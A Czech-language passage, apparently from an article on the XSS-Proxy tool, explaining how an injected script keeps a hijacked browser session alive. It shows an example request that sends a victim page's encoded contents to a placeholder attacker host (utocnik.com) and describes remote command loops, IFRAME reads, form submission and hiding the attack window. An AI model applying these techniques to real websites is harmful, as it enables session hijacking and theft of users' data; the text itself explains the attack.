volání skriptu obětí jsou jako volání normálniho dokumentu a ukládají parm/info na URL za jméno skriptu/stránky. Toto volání skriptu způsobý na serveru útočníka něco jako:GET /xss.js?data=Encoded_innerHTML_Contents HTTP/1.1Je to o něco víc komplexnější než to, že IE limituje délku URL (na přibližně 2049 znaků), takže většina dokumentů bude potřebovat naporcovat na části, které se na skritp URL request budou schopny dát dohromady. Aktuální nástroje se s tímto snaží vypořádat tak, že umísťují do URL dotazů přídavné informace pro znovusestavení (podobně jak to funguje u TCP/IP paketů).2 – Server na http://utocnik.com odpoví na poslední požadavek skriptu s více skirpt příkazy pro zachování trvání. Server buďto odpoví pomocía.) loop requestu (obyčejně řekne oběti počkej pár vteřin, pak znovu zkontroluj zda-li existují další příkazy skriptu)b.) dokument requestu (vlož dokument do IFRAME, přečti ho a přepošli výsledky pokud tě o to skript požádá)c.) submit requestu (nastav hodnoty vstupu ve formuláři s IFRAME, odešli, čekej na odpověď, přečti odpověď přepošli výsldek zpátky pokud o to skript požádá).Nebo pomocí javascript var/funkce požadavek na vyhodonocení (vyhodnoť výraz uvnitř aktuálniho okna v prohlížeči oběti a vrať výsledek+get příkazy). Proces pokračuje tak dloho jak oběť setrváva na stejné stránce.Zde je ASCII vizualizace okna a vysvětlení v souvislostech s cílem útočníka, po tom co je oběť přesměrována na finálni cíl a inicializován únos session:Existuje řada metod pro zamaskování aktuálniho „rezidentního“ okna pro útok (attack window) nebo IFRAME zaváděče. Celé okno lze schovat, stejně tak zrušit původní obsah stránek nebo proste použít skrytý IFRAME. Nástroj XSS-Proxy o kterém mluvíme, necháva okno včetně IFRAME pro oběť viditelné, ale modifikace je triviální (třeba interaktivně s Javascript Eval from). Existují i metody jak donutiti uživatele otevřít nové okno a obejít blokování pop-up oken. Jak? XSS proces přepíše odkazy v originálním dokumentu a otevření okne je pak pouze otázkou kliku. Nové oknomůže být kopii (zrcadlem) toho co si uživatel právě prohlíží, nebo výsledek odkliknutého odkazu ve veřejném XSS dokumentu a zmanipuluje oběť tak, že okno kontrolované XSS nechá běžet když dál surfuje.

folder_openPřiřazené štítky